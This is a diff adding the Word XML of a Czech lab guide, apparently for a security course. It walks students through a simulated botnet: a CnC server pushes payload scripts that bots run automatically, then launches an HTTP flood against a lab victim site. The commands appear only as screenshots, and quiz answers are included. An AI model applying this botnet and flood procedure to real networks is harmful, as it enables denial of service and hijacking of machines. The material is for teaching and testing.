+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5468099" cy="2030277"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>V </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>shellu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> CnC serveru </w:t>
+      </w:r>
+      <w:r>
+        <w:t>se přemístíme do /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>home</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">/Debian/ a nástrojem </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> stáhneme oba scripty.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F9CFA0B" wp14:editId="2A49DEE8">
+            <wp:extent cx="5208104" cy="3688735"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="1233946285" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1233946285" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5215607" cy="3694049"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tím je připraven CnC server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Krok 3. Zkouška funkčnosti prvků</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ještě pro ujištění, že vše funguje si spustíme DNS </w:t>
+      </w:r>
+      <w:r>
+        <w:t>server,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">kde </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bychom </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">měli </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">najít script </w:t>
+      </w:r>
+      <w:r>
+        <w:t>log_ips.py.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05D5DF2D" wp14:editId="78DF86E1">
+            <wp:extent cx="2238687" cy="333422"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1392880168" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1392880168" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2238687" cy="333422"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Po spuštění </w:t>
+      </w:r>
+      <w:r>
+        <w:t>bude poslouchat na portu 9445. Na CnC serveru si zkopírujeme payload_check_to_server.py na payloadcheck.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D76232" wp14:editId="29DEF753">
+            <wp:extent cx="5849166" cy="476316"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="342665151" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="342665151" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5849166" cy="476316"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">A navíc spustíme manuálně serverc.py (většina scriptů je už spuštěna jako service, kde ale špatně uvidíme výstup ze spuštěných souborů), který je vlastně náš hlavní script na CnC serveru. Ten bude odpovídat </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>botům</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> z botnetu pakety, ve kterých bude obsah souboru payloadcheck.py. Tím můžeme celému botnetu automaticky rozposílat jakýkoliv script který chceme.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">(Zde můžeme spustit spíše </w:t>
+      </w:r>
+      <w:r>
+        <w:t>rovnou</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> na CnC </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>serveru,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> než přes Kali, znova za důrazem se podívat co se přesně děje při spuštění scénáře)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB14CEE" wp14:editId="3BE1379A">
+            <wp:extent cx="3705742" cy="362001"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="239304446" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="239304446" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3705742" cy="362001"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Nakonec pro celkovou kontrolu si ještě spustíme http/Apache server, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tím by měl fungovat web server. Z Kali tak můžeme zkontrolovat vyhledáním 176.16.1.10 a </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId32" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hypertextovodkaz"/>
+          </w:rPr>
+          <w:t>www.victim.com</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA32BCF" wp14:editId="11FCB9E2">
+            <wp:extent cx="3570136" cy="896573"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="815063916" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="815063916" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3576296" cy="898120"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="258BB369" wp14:editId="64576F52">
+            <wp:extent cx="4818490" cy="1029364"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+            <wp:docPr id="2144724043" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2144724043" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4824262" cy="1030597"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Obě dvě adresy by měli ukazovat to samé.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Otázka 2.3: Co nám překládá adresu victim.com, že stále vidíme stránku web serveru?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>DNS server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A pokud teď spustíme jednoho bota z botnetu, tak na CnC serveru (kde je zapnutý serverc.py) a na DNS serveru (kde je zapnutý log_ips.py), by se měli ukázat informace kam a co se posílá.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CF9D10E" wp14:editId="0385A32C">
+            <wp:extent cx="6395085" cy="2687320"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+            <wp:docPr id="812256795" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="812256795" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6395085" cy="2687320"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123E8DFC" wp14:editId="04D9CA67">
+            <wp:extent cx="3839111" cy="466790"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="1920072449" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1920072449" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId36"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3839111" cy="466790"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Jak jde vidět z ukázky, bot z botnetu kontaktoval CnC server (taková žádost, jestli CnC server nemá nějaký kód na spuštění), který mu odpověděl obsahem payloadcheck.py, plus ještě vidíme zkrácenou zprávu že z našeho serveru 10.2.1.10 se odpověď poslala na IP adresu 192.1.1.11.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Zároveň na DNS serveru očekáváme zprávu na portu 9445, což ve payload scriptu teď je nastavená jako </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>target_port</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, která nakonec přijde a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">DNS server si </w:t>
+      </w:r>
+      <w:r>
+        <w:t>za</w:t>
+      </w:r>
+      <w:r>
+        <w:t>píše</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> IP adresu odesilatele. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Otazka</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.4: Jaký balíček a jaké moduly se používají na </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>srcriptu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> na CnC serveru.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">balíček </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>scapy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a moduly send, IP, TCP, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Raw</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Část 3. Scénář HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>flood</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Krok 1. Spuštění útoku</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Z minulé části teď můžeme vypnou</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">t script který běží na DNS serveru a u už zapnutého bota spustíme </w:t>
+      </w:r>
+      <w:r>
+        <w:t>bot_listen.py (tento script už běží v pozadí, ale pro jeho output ho spustíme manuálně)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D61F2F" wp14:editId="76770658">
+            <wp:extent cx="3610479" cy="457264"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1011228797" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1011228797" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3610479" cy="457264"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Přes Kali na CnC serveru zkopírujeme payload_http_test.py na payloadcheck.py a spustíme script cnc_ping.py, který „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pingne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“ každého bota, který už někdy kontaktoval CnC server, to spustí v </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bot_listen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> scriptu to, že spustí další script, který už kontaktuje CnC server žádostí o payload soubor a ten mu ho zpětně pošle. A po obdržení se rovnou spustí.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C7BCED" wp14:editId="0B67081B">
+            <wp:extent cx="4333461" cy="2407476"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1339431845" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1339431845" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4384058" cy="2435585"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C67872" wp14:editId="479F0745">
+            <wp:extent cx="6265628" cy="2755483"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
+            <wp:docPr id="1777630431" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1777630431" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId39"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6267222" cy="2756184"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548B9613" wp14:editId="5D53FF67">
+            <wp:extent cx="6011186" cy="3045882"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="2540"/>
+            <wp:docPr id="1489498170" name="Obrázek 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1489498170" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6015718" cy="3048178"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Ze snímků si tedy můžeme </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ověřit,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> že se vážně útok podařil rozběhnout – cnc_ping.py se spustil správně (po zapnutí jakéhokoliv bota, pokud má přístup k CnC serveru, by se měl přiřadit do .log souboru na CnC serveru) a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>kontaktoval</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> adresu 192.1.1.11.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
